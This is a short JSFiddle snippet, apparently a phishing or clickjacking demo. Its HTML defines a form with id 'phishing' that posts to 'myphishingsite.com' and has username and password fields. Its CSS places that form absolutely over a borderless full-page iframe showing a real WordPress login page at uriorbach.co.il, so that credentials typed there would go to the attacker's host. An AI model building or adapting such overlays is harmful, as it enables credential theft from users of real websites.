JSFiddle - React, Tailwind, and code Playground

by Ronny

HTML

<form id="phishing" action="myphishingsite.com">
    <input id="username">
    <input id="password">
    <input type="button" id="hiddenSubmit">
</form>
<iframe src="http://www.uriorbach.co.il/wp-login.php?redirect_to=http%3A%2F%2Furiorbach.co.il%2Fwp-admin%2F"></iframe>

CSS

form {background: red; width: 300px; height: 120px; position: absolute; right: 200px; top: 200px; font-size: 20px; color: orange;}
iframe {width: 100%; height: 800px; border: none;}